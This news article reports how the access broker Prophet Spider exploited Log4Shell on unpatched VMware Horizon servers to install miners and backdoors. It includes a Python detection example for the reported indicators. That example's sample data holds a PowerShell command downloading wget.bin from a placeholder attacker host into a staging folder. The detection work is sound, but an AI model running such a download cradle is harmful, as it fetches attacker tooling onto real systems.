A gang of cyber criminals known for gaining access to computer systems and selling that access to others has been discovered using the Apache Log4j vulnerability, Log4Shell, to deploy cryptocurrency miners and backdoors on unpatched VMware Horizon servers.
In a blog post published on Wednesday, BlackBerry researchers Ryan Gibson, Cody Starks and Will Icard revealed that Prophet Spider was behind the attacks, and that the attacks can be reliably identified by monitoring the Tomcat service ws_TomcatService.exe used by VMware Horizon.
The researchers explained that after exploiting the Log4Shell vulnerability to gain access to a system, the attackers used a PowerShell command to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some cases Cobalt Strike beacons, a type of system backdoor, were also installed on the compromised machines.
One of the indicators that helps pin down Prophet Spider's attacks is the saving of malicious files under the folder path C:\Windows\Temp\7fde, the researchers wrote. The threat actor also downloaded a copy of the wget.bin executable, which the group has used to fetch additional files on historically infected hosts. The IP address used in the download cradle has also previously been attributed to the group.
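The indicators above (ws_TomcatService.exe spawning PowerShell, the C:\Windows\Temp\7fde staging path, and a download of wget.bin) can be turned into a simple detection over process-creation events. The following Python is an added example, not code from the BlackBerry report; the event layout mimics Sysmon Event ID 1 fields, the sample events are constructed, and the attacker IP is a placeholder because the article does not give it.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (fields modelled on Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str

# Constructed sample events: one matching the reported Prophet Spider chain,
# two benign ones. These are not logs from any real incident.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -c "iwr http://ATTACKER-IP-PLACEHOLDER/wget.bin '
              r'-OutFile C:\Windows\Temp\7fde\wget.bin"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\nightly-backup.ps1"),
    ProcEvent(r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
              r"C:\Windows\System32\conhost.exe",
              r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

def score_event(ev):
    """Return the list of page-reported indicators matched by one event."""
    reasons = []
    parent = ev.parent_image.lower()
    cmd = ev.command_line.lower()
    # Tomcat (the Log4Shell-exposed Horizon service) should not launch PowerShell.
    if parent.endswith("ws_tomcatservice.exe") and "powershell" in ev.image.lower():
        reasons.append("ws_TomcatService.exe spawned PowerShell")
    # Staging folder reported by BlackBerry for Prophet Spider.
    if r"\windows\temp\7fde" in cmd:
        reasons.append("file written under C:\\Windows\\Temp\\7fde")
    # Tooling the group has reused on historically infected hosts.
    if "wget.bin" in cmd:
        reasons.append("download of wget.bin")
    return reasons

def find_suspicious(events):
    """Return (image, reasons) for every event that matches at least one indicator."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.image, reasons))
    return hits
```

Any single indicator is worth a look, but the Tomcat-to-PowerShell parent/child relationship is the most durable of the three, since the folder name and tooling can change between campaigns.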
Prophet Spider suggests an improvement in foothold exploitation
Tony Lee, vice president of BlackBerry Global Services and Technical Operations, explained that initial access brokers like Prophet Spider break into a computer system, establish a foothold, and then sell that access to other malicious actors, who would use the system to steal data, infect nearby systems, or deploy ransomware. “If they find a weakness, they’ll use it,” he said, “and then wait to see who will be the highest bidder.”
“Now that they have the ability to keep a foothold in the system, I think we’ll see an improvement in Log4j exploitation,” Lee added.
Lee acknowledged that it was impossible to determine the number of systems compromised by the group. “They can take anywhere from a few weeks to a month to sell access,” he explained. However, he said the BlackBerry Research and Intelligence and Incident Response teams have confirmed intrusions at multiple organizations.
No individual vertical appears to be in the gang’s crosshairs. “They seem opportunistic,” Lee said. “We didn’t see a specific vertical being targeted. It’s more along the lines of ‘spray and pray’.”
Many VMware implementations remain unpatched
In their blog post, the BlackBerry researchers noted that the exact number of applications, and their various versions, affected by the Log4j vulnerabilities may never be fully known. Although VMware released a patch and mitigation guidance in December 2021 in response to the vulnerabilities, they explained that many deployments were never patched, leaving them open to exploitation.
“It’s difficult for many organizations to scan and patch all of their digital assets, even just outwardly,” Lee said. “I see companies struggling to identify their assets. If you can’t identify them, you can’t scan them. And if you can’t scan them, you can’t have effective vulnerability management programs.”
Copyright © 2022 IDG Communications, Inc.